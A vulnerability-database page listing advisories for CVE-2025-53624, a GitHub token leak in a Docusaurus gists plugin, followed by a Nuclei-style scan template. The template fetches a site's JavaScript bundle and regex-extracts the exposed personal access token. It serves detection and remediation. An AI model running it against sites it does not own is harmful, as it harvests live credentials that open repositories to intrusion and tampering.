| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-53624 | 10 Jul 202509:47 | – | circl | |
| Docusaurus gists plugin 信息泄露漏洞 | 9 Jul 202500:00 | – | cnnvd | |
| CVE-2025-53624 | 9 Jul 202521:08 | – | cve | |
| CVE-2025-53624 docusaurus-plugin-content-gists Exposes GitHub Personal Access Token | 9 Jul 202521:08 | – | cvelist | |
| EUVD-2025-20874 | 3 Oct 202520:07 | – | euvd | |
| docusaurus-plugin-content-gists vulnerability exposes GitHub Personal Access Token | 9 Jul 202522:40 | – | github | |
| CVE-2025-53624 | 9 Jul 202521:15 | – | nvd | |
| CVE-2025-53624 docusaurus-plugin-content-gists Exposes GitHub Personal Access Token | 9 Jul 202521:08 | – | osv | |
| GHSA-QF34-QPR4-5PPH docusaurus-plugin-content-gists vulnerability exposes GitHub Personal Access Token | 9 Jul 202522:40 | – | osv | |
| PT-2025-28964 · Unknown · Docusaurus-Plugin-Content-Gists | 9 Jul 202500:00 | – | ptsecurity |
id: CVE-2025-53624
info:
name: Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure
author: darses
severity: high
description: |
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
impact: |
A GitHub personal access token exposure vulnerability can grant an attacker unauthorized access to your repositories and organization resources, potentially leading to data exfiltration, code injection, and supply chain attacks.
remediation: |
Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.
reference:
- https://github.com/webbertakken/docusaurus-plugin-content-gists/commit/8d4230b82412edb215ddfa9e609d178510a5fe31
- https://github.com/webbertakken/docusaurus-plugin-content-gists/security/advisories/GHSA-qf34-qpr4-5pph
- https://nvd.nist.gov/vuln/detail/CVE-2025-53624
classification:
epss-score: 0.01842
epss-percentile: 0.76437
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2025-53624
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
vendor: webbertakken
product: docusaurus_plugin_content_gists
shodan-query: http.html:"Docusaurus"
fofa-query: body="Docusaurus"
tags: cve,cve2025,docusaurus,exposure,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "docusaurus_locale")'
condition: and
internal: true
extractors:
- type: regex
name: js_file_url
group: 1
regex:
- '<script src="/(assets/js/main\.[^"]*\.js)"'
internal: true
- method: GET
path:
- "{{BaseURL}}/{{js_file_url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "personalAccessToken")'
condition: and
extractors:
- type: regex
name: github_token
group: 1
regex:
- ',personalAccessToken:"([^"]*)"}'
# digest: 4a0a004730450220374787032055d8c2a3413307e7fbf643052d3bfed58906c7becdddecfc8a48c2022100b07fd6f94f8498d48caf23ca0633dc19842329c4284897eb17c5f342b491162a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation